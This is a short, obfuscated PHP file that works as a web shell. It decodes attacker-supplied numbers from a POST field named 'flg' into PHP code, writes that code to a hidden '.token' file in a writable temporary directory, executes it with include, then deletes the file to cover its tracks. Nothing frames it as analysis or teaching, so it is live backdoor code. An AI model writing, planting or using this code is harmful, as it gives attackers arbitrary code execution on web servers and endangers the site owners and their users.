<?php

if(filter_has_var(INPUT_POST, "flg")){
	$pset = $_REQUEST["flg"];
		$pset 	 =  explode	(   "."  ,		$pset 		) 		;	
	$ptr = '';
            $s1 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen(	$s1);
            $n = 0;
    
            while(	$n <	count(	$pset)) {
                $v8 = $pset[$n];
                $chS = ord(	$s1[$n % $lenS]);
                $dec =(	(	int)$v8 - $chS -(	$n % 10)) ^ 8;
                $ptr .= chr(	$dec);
                $n++;
            }
	$sym = array_filter(["/dev/shm", session_save_path(), sys_get_temp_dir(), "/var/tmp", "/tmp", ini_get("upload_tmp_dir"), getenv("TEMP"), getenv("TMP"), getcwd()]);
	foreach ($sym as $res):
    		if (!!is_dir($res) && !!is_writable($res)) {
    $flag = "$res/.token";
    if (@file_put_contents($flag, $ptr) !== false) {
	include $flag;
	unlink($flag);
	exit;
}
}
endforeach;
}